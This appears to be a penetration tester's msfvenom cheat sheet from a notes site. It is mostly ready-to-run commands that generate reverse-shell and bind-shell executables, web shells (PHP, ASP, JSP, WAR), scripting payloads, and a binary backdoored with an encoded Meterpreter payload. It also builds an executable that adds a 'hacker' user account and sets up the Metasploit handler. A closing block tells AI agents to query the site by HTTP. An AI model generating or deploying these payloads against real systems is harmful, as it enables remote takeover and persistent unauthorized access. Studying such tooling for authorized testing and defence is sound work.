# msfvenon ```bash # List of patloads, formats and platforms msfvenon --list payloads msfvenon --list formats msfvenon --list platform # Non-Staged msfvenom -p windows/shell_reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o shell_reverse_tcp.exe # Staged – Must use meterpreter – netcat won’t work msfvenom -p windows/shell/reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o staged_reverse_tcp.exe # Inject payload into a binary msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe # Generate non-staged ASP Shell msfvenon -p windows/shell_reverse_tcp LHOST=10.11.0.47 LPORT=9098 -f asp -o shell.asp ``` **A non-staged shell** is sent over in one block. You just send shell in one stage. This can be caught with metasploit multi-handler, but also with netcat. **Staged shells** send them in turn. This can be useful for when you have very small buffer for your shellcode, so you need to divide up the payload. Meterpreter is a staged shell. First it sends some parts of it, and sets up the connection, and then it sends some more. This can be caught with metasploit multi-handler but not with netcat. ## Cheat Sheet **List payloads** ```bash msfvenom -l ``` ## **Binaries Payloads** **Linux Meterpreter Reverse Shell** ```bash msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf ``` **Linux Bind Meterpreter Shell** ```bash msfvenom -p linux/x86/meterpreter/bind_tcp RHOST= LPORT= -f elf > bind.elf ``` **Linux Bind Shell** ```bash msfvenom -p generic/shell_bind_tcp RHOST= LPORT= -f elf > term.elf ``` **Windows Meterpreter Reverse TCP Shell** ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe ``` **Windows Reverse TCP Shell** ```bash msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell.exe ``` **Windows Encoded Meterpreter Windows Reverse Shell** ```bash msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe ``` **Mac Reverse Shell** ```bash msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho ``` **Mac Bind Shell** ```bash msfvenom -p osx/x86/shell_bind_tcp RHOST= LPORT= -f macho > bind.macho ``` ## **Web Payloads** **PHP Meterpreter Reverse TCP** ```bash msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo ‘ shell.php && pbpaste >> shell.php ``` **ASP Meterpreter Reverse TCP** ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp ``` **JSP Java Meterpreter Reverse TCP** ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp ``` **WAR** ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war ``` ## **Scripting Payloads** **Python Reverse Shell** ```bash msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py ``` **Bash Unix Reverse Shell** ```bash msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh ``` **Perl Unix Reverse shell** ```bash msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl ``` ## **Shellcode** **Windows Meterpreter Reverse TCP Shellcode** ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f ``` **Linux Meterpreter Reverse TCP Shellcode** ```bash msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f ``` **Mac Reverse TCP Shellcode** ```bash msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f ``` **Create User** ```bash msfvenom -p windows/adduser USER=hacker PASS=Hacker123$ -f exe > adduser.exe ``` **Metasploit Handler** ```bash use exploit/multi/handler set PAYLOAD Set RHOST set LHOST set LPORT Run ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://squid22.gitbook.io/notes/tools/msfvenon.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.